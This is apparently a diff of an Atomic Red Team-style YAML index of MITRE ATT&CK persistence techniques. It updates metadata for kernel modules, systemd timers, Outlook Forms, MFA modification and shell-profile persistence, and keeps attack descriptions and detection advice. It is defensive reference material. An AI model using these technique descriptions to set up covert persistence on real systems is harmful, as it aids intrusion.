-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: MacOS - Load Kernel Module via kextload and kmutil
@@ -36558,7 +36981,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -36584,12 +37007,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -36667,9 +37088,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -36696,7 +37116,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -36718,41 +37138,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -36761,22 +37150,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -36842,7 +37258,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -36916,11 +37331,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -36937,7 +37351,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -36947,7 +37360,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -36956,19 +37369,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -37016,11 +37427,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -37049,24 +37461,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -37101,9 +37515,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -37163,7 +37574,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -37188,13 +37599,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -37247,8 +37656,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -37296,78 +37705,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -37415,6 +37757,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -37425,9 +37771,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -37436,8 +37786,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests:
     - name: Add command to .bash_profile
@@ -37516,7 +37925,7 @@ persistence:
